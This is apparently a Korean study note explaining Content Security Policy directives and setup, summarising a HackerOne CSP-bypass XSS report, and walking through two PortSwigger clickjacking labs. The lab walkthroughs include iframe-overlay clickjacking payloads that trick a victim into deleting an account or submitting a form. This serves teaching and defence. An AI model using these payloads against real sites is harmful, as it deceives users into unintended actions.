CSP(Content Security Policy)🔒

---

CSP란

CSP : 콘텐츠 보안 정책이라고도 하며 XSS(Cross Site Scripting) 공격을 방지하기 위해 만들어진 정책이며 웹 사이트 소유자가 규칙을 적용.

CSP 지시문 예시

• default-src : 디폴트 설정
• connect-src : 연결할 수 있는 URL을 제한
• script-scr : 스크립트 관련 권한 집합 제어
• child-src : iframe 태그에서 사용
• style-src : 스타일시트 관련 권한 집합 제어
• font-src : 웹 글꼴을 제공할 출처 지정
• img-src : 이미지 관련 권한 집합 제어
• report-uri : 정책 위반 시 브라우저가 보고서 보낼 URL 지정

src 옵션

• none : 아무것도 허용하지 않음
• self : 현재 출처는 허용, 하위 도메인 허용하지 않음
• unsafe-inline : 소스 코드 내 인라인 자바 스크립트 및 CSS 허용
• unsafe-eval : eval과 같은 텍스트-자바스크립트 매커니즘 허용

CSP 적용 방법

1. meta 태그 설정

<meta http-equiv="Content-Security-Policy" content="default-src https://cdn.example.net; child-src 'none'; object-src 'none'"> //frame-ancestors, report-uri, sandbox에서 사용불가

2. php 헤더 설정

 <?php
 $headerCSP = "Content-Security-Policy:".
              "default-src 'self';". // 기본은 자기 도메인만 허용
              "connect-src 'self' ;". // ajax url은 자기 도메인만 허용
              "script-src 'self' example.com code.jquery.com https://ssl.google-analytics.com ;". // 자기자신, 접근허용 도메인 설정
              "style-src 'self' 'unsafe-inline';".
              "report-uri https://example.com/csp_report.php;"; // 보안 정책 오류 레포트 URL 지정(meta 태그에선 사용불가)
 header($headerCSP);

3. nonce 설정

<?php
 $nonce_key = hash('sha256', microtime());
 ?> //해시 sha256을 이용하여 난수 생성, php로 헤더 설정 또는 meta tag에 삽입
 
 Content-Security-Policy: script-src 'nonce-EDNnf03nceIOfn39fn3e9h3sdfa'
 
 <script nonce=EDNnf03nceIOfn39fn3e9h3sdfa>
    alert('해당 스크립트는 사용가능한 인라인 스크립트 입니다.');
 </script>
 
 <script>
    alert('해당 스크립트는 사용 불가능한 인라인 스크립트 입니다.');
 </script>

사용되는 CSP헤더 예시

• Content-Security-Policy : W3C 문서가 제안한 표준 헤더 이름. 구글 크롬, 파이어 폭스, 웹킷 등이 버전에 따라 지원
• X-WebKit-CSP : 구형이며 실험적 헤더. 구글 크롬 및 기타 웹킷 기반 브라우저에 도입.
• X-Content-Security-Policy : 구형이며 실험적인 헤더. 게코 2 기반 브라우저에 도입.

참조 : https://web.dev/csp/

---

CSP bypass🔓

---

CSP bypass란 CSP를 우회하는 공격 방법을 말함.

CSP bypass 취약점 예시

• 통화 변환에 사용하던 엔드포인트가 URL 매개변수에 사용자의 입력이 제대로 검사되지 않는 XSS 취약점이 생김. 악의적인 사용자가 브라우저 실행이 가능한 자바스크립트, HTML과 같은 다른 타입의 코드를 주입할 수 있음.
  이는 다른 사용자의 브라우저 페이지 DOM(Document Object Model)에서 해당 사용자의 인식이나 동의 없이 실행되어 문제 발생.
  응답이 반환되기 전 사용자 입력을 검증하는 추가적인 제어를 실행함으로 해결.

  출처 : https://hackerone.com/reports/799881

---

Clickjacking🖱️

---

Clickjacking이란 사용자가 인지하지 못한 화면이나 버튼을 클릭하면 의도하지 않은 행위로 이어도록 하는 해킹 기법을 말함.

Portswigger 풀이

1. Basic clickjacking with CSRF token protection
   
   가장 처음 보이는 화면으로 My account에서 문제에서 알려준 username과 password를 입력하여야 함.
   
   입력 후 Delete account라는 버튼이 생기면 Go to exploit server에 들어가서 clickjacking을 실행할 프레임을 만듦.

<style>
    iframe {
        position:relative;
        width:700;
        height: 500;
        opacity:0.001;
        z-index: 2;
    }
    div {
        position:absolute;
        top:500;
        left:60;
        z-index: 1;
    }
</style>
<div>Test me</div>
<iframe src="https://0ac200010381cb0fc024110300670063.web-security-academy.net/my-account"></iframe>

이 코드를 body 창에 입력하여 Delete account와 Test me글자가 겹치도록 조정한 후 Deliver exploit to victim으로 제출하면 문제를 해결 할 수 있음.


2. Exploiting clickjacking vulnerability to trigger DOM-based XSS

가장 처음 보이는 화면으로 Submit feedback에 들어가서 Go to exploit server에 들어감.

Submit feedback에 들어가면 화면 아래에 있는 Submit feedback 버튼과 겹치도록 clickjacking을 실행하여야 함.

<style>
	iframe {
		position:relative;
		width:700;
		height: 500;
		opacity: 0.5;
		z-index: 2;
	}
	div {
		position:absolute;
		top:600;
		left:80;
		z-index: 1;
	}
</style>
<div>Test me</div>
<iframe
src="https://0a2600c3040f435dc0c23bc7007c0039.web-security-academy.net/feedback"></iframe>

1번 문제와 동일하게 body 창에 위와 같은 코드를 입력하고 submit feedback 버튼과 Test me라는 글자가 겹치도록 조정한 후 Deliver exploit to victim으로 제출하면 문제가 해결됨.